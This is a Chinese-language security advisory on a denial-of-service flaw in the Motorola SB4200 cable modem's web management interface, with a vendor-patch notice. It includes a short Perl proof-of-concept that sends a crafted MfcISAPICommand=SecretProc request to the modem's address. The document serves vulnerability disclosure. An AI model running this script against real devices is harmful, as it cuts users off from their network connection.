发布日期：2006-10-03
更新日期：2006-10-11

受影响系统：

Motorola Cable Modem SB4200

描述：

---

BUGTRAQ  ID: 20309

Motorola SB4200是一款即插即用的电缆调制解调器。

SB4200的Web管理接口在处理用户请求时存在漏洞，远程攻击者可以通过发送将MfcISAPICommand参数设置为SecretProc的特定HTTP请求导致拒绝服务。

<*来源：Dave Gil
  
  链接：http://secunia.com/advisories/22359/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl -w
###################################################
# Remote Motorola SB4200 DoS attack.              #
# By Dave Gil.                                    #
# Infosec Labs                                    #
###################################################

use strict;
use HTTP::Request::Common qw (POST GET);
use LWP::UserAgent;
my $ua = LWP::UserAgent->new();
my $url = "http://192.168.100.1/";
my $req = $ua->post( $url, [MfcISAPICommand => 'SecretProc', Secret => 'A' x int rand(4000)]);

print "The DoS has been sent.";
exit();

建议：

---

厂商补丁：

Motorola
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.motorola.com/

浏览次数：3035
严重程度：1（网友投票）